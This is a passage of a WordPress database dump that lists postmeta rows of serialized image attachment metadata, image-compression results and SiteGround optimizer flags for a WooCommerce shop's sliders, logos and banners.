idth\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.96479999999999999;}s:3:\"end\";i:1591599241;}}'),(324,348,'siteground_optimizer_optimization_attempts','1'),(325,348,'siteground_optimizer_is_optimized','1'),(326,348,'siteground_optimizer_webp_conversion_attempts','1'),(327,348,'siteground_optimizer_webp_conversion_failed','1'),(329,403,'_wp_page_template','frontpage.php'),(330,431,'_wp_attached_file','2020/07/slider-n1-1.jpg'),(331,431,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:23:\"2020/07/slider-n1-1.jpg\";s:8:\"filesize\";i:30190;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:23:\"slider-n1-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15647;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:23:\"slider-n1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2784;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:21:\"slider-n1-1-50x23.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:733;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(332,431,'tiny_compress_images','a:10:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:40409;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:30190;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:920;s:6:\"height\";i:430;s:5:\"ratio\";d:0.74709999999999999;}s:3:\"end\";i:1594122674;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:8492;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:8492;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:5:\"ratio\";d:1;}s:3:\"end\";i:1594122679;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:5620;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:5620;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:1;}s:3:\"end\";i:1594122677;}s:12:\"medium_large\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:32523;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:28797;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:5:\"ratio\";d:0.88539999999999996;}s:3:\"end\";i:1594122682;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:16134;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:16134;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:1;}s:3:\"end\";i:1594122686;}s:18:\"woocommerce_single\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:22840;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:22840;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:5:\"ratio\";d:1;}s:3:\"end\";i:1594122689;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:3094;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:3094;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:1;}s:3:\"end\";i:1594122692;}s:12:\"shop_catalog\";a:0:{}s:11:\"shop_single\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}}'),(333,431,'siteground_optimizer_optimization_attempts','1'),(334,431,'siteground_optimizer_is_optimized','1'),(335,431,'siteground_optimizer_webp_conversion_attempts','1'),(336,431,'siteground_optimizer_webp_conversion_failed','1'),(337,432,'_wp_attached_file','2020/07/slider2n-1.jpg'),(338,432,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:22:\"2020/07/slider2n-1.jpg\";s:8:\"filesize\";i:53301;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"slider2n-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21573;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"slider2n-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4030;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:20:\"slider2n-1-50x23.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:888;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(339,432,'tiny_compress_images','a:10:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:69967;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:53301;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:920;s:6:\"height\";i:430;s:5:\"ratio\";d:0.76180000000000003;}s:3:\"end\";i:1594122669;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:15240;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:15240;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:5:\"ratio\";d:1;}s:3:\"end\";i:1594122674;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:8047;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:8047;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:1;}s:3:\"end\";i:1594122671;}s:12:\"medium_large\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:58818;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:52782;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:5:\"ratio\";d:0.89739999999999998;}s:3:\"end\";i:1594122678;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:23018;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:19740;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.85760000000000003;}s:3:\"end\";i:1594122681;}s:18:\"woocommerce_single\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:41125;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:35811;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:5:\"ratio\";d:0.87080000000000002;}s:3:\"end\";i:1594122684;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:4486;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:4486;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:1;}s:3:\"end\";i:1594122686;}s:12:\"shop_catalog\";a:0:{}s:11:\"shop_single\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}}'),(340,432,'siteground_optimizer_optimization_attempts','1'),(341,432,'siteground_optimizer_is_optimized','1'),(342,432,'siteground_optimizer_webp_conversion_attempts','1'),(343,432,'siteground_optimizer_webp_conversion_failed','1'),(376,453,'_wp_attached_file','2020/07/banner-ad.png'),(377,453,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:915;s:6:\"height\";i:150;s:4:\"file\";s:21:\"2020/07/banner-ad.png\";s:8:\"filesize\";i:27828;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"banner-ad-320x150.png\";s:5:\"width\";i:320;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4504;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"banner-ad-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5391;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:18:\"banner-ad-50x8.png\";s:5:\"width\";i:50;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:792;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(378,453,'tiny_compress_images','a:10:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:27828;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:27828;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:915;s:6:\"height\";i:150;s:5:\"ratio\";d:1;}s:3:\"end\";i:1594122668;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:15474;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:6392;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:49;s:5:\"ratio\";d:0.41310000000000002;}s:3:\"end\";i:1594122673;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:2556;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:2143;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.83840000000000003;}s:3:\"end\";i:1594122670;}s:12:\"medium_large\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:88156;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:27302;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:768;s:6:\"height\";i:126;s:5:\"ratio\";d:0.30969999999999998;}s:3:\"end\";i:1594122677;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:4373;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4373;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:150;s:5:\"ratio\";d:1;}s:3:\"end\";i:1594122679;}s:18:\"woocommerce_single\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:52764;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:17181;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:98;s:5:\"ratio\";d:0.3256;}s:3:\"end\";i:1594122683;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:4137;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:2228;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.53859999999999997;}s:3:\"end\";i:1594122685;}s:12:\"shop_catalog\";a:0:{}s:11:\"shop_single\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}}'),(379,453,'siteground_optimizer_optimization_attempts','1'),(380,453,'siteground_optimizer_is_optimized','1'),(381,453,'siteground_optimizer_webp_conversion_attempts','1'),(382,453,'siteground_optimizer_webp_conversion_failed','1'),(383,456,'_wp_attached_file','2020/07/logo.png'),(384,456,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:126;s:6:\"height\";i:45;s:4:\"file\";s:16:\"2020/07/logo.png\";s:8:\"filesize\";i:1294;s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:15:\"logo-100x45.png\";s:5:\"width\";i:100;s:6:\"height\";i:45;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1626;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:14:\"logo-50x18.png\";s:5:\"width\";i:50;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1101;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(385,456,'tiny_compress_images','a:3:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:1743;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:1294;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:126;s:6:\"height\";i:45;s:5:\"ratio\";d:0.74239999999999995;}s:3:\"end\";i:1594122667;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:1678;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:1093;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:45;s:5:\"ratio\";d:0.65139999999999998;}s:3:\"end\";i:1594122670;}s:14:\"shop_thumbnail\";a:0:{}}'),(386,456,'siteground_optimizer_optimization_attempts','1'),(387,456,'siteground_optimizer_is_optimized','1'),(388,456,'siteground_optimizer_webp_conversion_attempts','1'),(389,456,'siteground_optimizer_webp_conversion_failed','1'),(390,459,'_wp_attached_file','2020/07/payment-e1643012756701.png'),(391,459,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:182;s:6:\"height\";i:30;s:4:\"file\";s:34:\"2020/07/payment-e1643012756701.png\";s:8:\"filesize\";i:2986;s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:33:\"payment-e1643012756701-100x30.png\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2785;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:31:\"payment-e1643012756701-50x8.png\";s:5:\"width\";i:50;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1110;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(392,459,'tiny_compress_images','a:4:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:4112;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3940;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:268;s:6:\"height\";i:30;s:5:\"ratio\";d:0.95820000000000005;}s:3:\"end\";i:1594122667;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:2603;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:2380;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:30;s:5:\"ratio\";d:0.9143;}s:3:\"end\";i:1594122670;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:1860;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:1711;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:5:\"ratio\";d:0.91990000000000005;}s:3:\"end\";i:1594122673;}s:14:\"shop_thumbnail\";a:0:{}}'),(393,459,'siteground_optimizer_optimization_attempts','1'),(394,459,'siteground_optimizer_is_optimized','1'),(395,459,'siteground_optimizer_webp_conversion_attempts','1'),(396,459,'siteground_optimizer_webp_conversion_failed','1'),(405,474,'_wp_attached_file','2020/07/woocommerce-placeholder.png'),(406,474,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:35:\"2020/07/woocommerce-placeholder.png\";s:8:\"filesize\";i:102644;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:35:\"woocommerce-placeholder-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11549;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2039;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:33:\"woocommerce-placeholder-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:816;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(407,474,'siteground_optimizer_optimization_attempts','1'),(408,474,'siteground_optimizer_is_optimized','1'),(409,474,'siteground_optimizer_webp_conversion_attempts','1'),(410,474,'siteground_optimizer_is_converted_to_webp','1'),(717,252,'_thumbnail_id','348'),(722,256,'_thumbnail_id','346'),(1107,486,'_wp_attached_file','2022/01/banner-ad.png'),(1108,486,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:915;s:6:\"height\";i:150;s:4:\"file\";s:21:\"2022/01/banner-ad.png\";s:8:\"filesize\";i:27828;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"banner-ad-320x150.png\";s:5:\"width\";i:320;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4504;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"banner-ad-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5391;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:18:\"banner-ad-50x8.png\";s:5:\"width\";i:50;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:792;}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"banner-ad-300x49.png\";s:5:\"width\";i:300;s:6:\"height\";i:49;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"banner-ad-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"banner-ad-768x126.png\";s:5:\"width\";i:768;s:6:\"height\";i:126;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"banner-ad-320x150.png\";s:5:\"width\";i:320;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"banner-ad-600x98.png\";s:5:\"width\";i:600;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"banner-ad-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:18:\"banner-ad-48x8.png\";s:5:\"width\";i:48;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:18:\"banner-ad-48x8.png\";s:5:\"width\";i:48;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1109,487,'_wp_attached_file','2022/01/logo.png'),(1110,487,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:126;s:6:\"height\";i:45;s:4:\"file\";s:16:\"2022/01/logo.png\";s:8:\"filesize\";i:1294;s:5:\"sizes\";a:5:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:15:\"logo-100x45.png\";s:5:\"width\";i:100;s:6:\"height\";i:45;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1626;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:14:\"logo-50x18.png\";s:5:\"width\";i:50;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1101;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"logo-100x45.png\";s:5:\"width\";i:100;s:6:\"height\";i:45;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:14:\"logo-48x17.png\";s:5:\"width\";i:48;s:6:\"height\";i:17;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:14:\"logo-48x17.png\";s:5:\"width\";i:48;s:6:\"height\";i:17;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1116,490,'_wp_attached_file','2022/01/02.png'),(1117,490,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:524;s:6:\"height\";i:398;s:4:\"file\";s:14:\"2022/01/02.png\";s:8:\"filesize\";i:466067;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:225988;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22992;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"02-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4597;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"02-300x228.png\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"02-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"02-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1118,491,'_wp_attached_file','2022/01/03.png'),(1119,491,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:535;s:6:\"height\";i:398;s:4:\"file\";s:14:\"2022/01/03.png\";s:8:\"filesize\";i:407495;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"03-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:179355;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"03-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23450;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"03-50x37.png\";s:5:\"width\";i:50;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4916;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"03-300x223.png\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"03-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"03-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"03-48x36.png\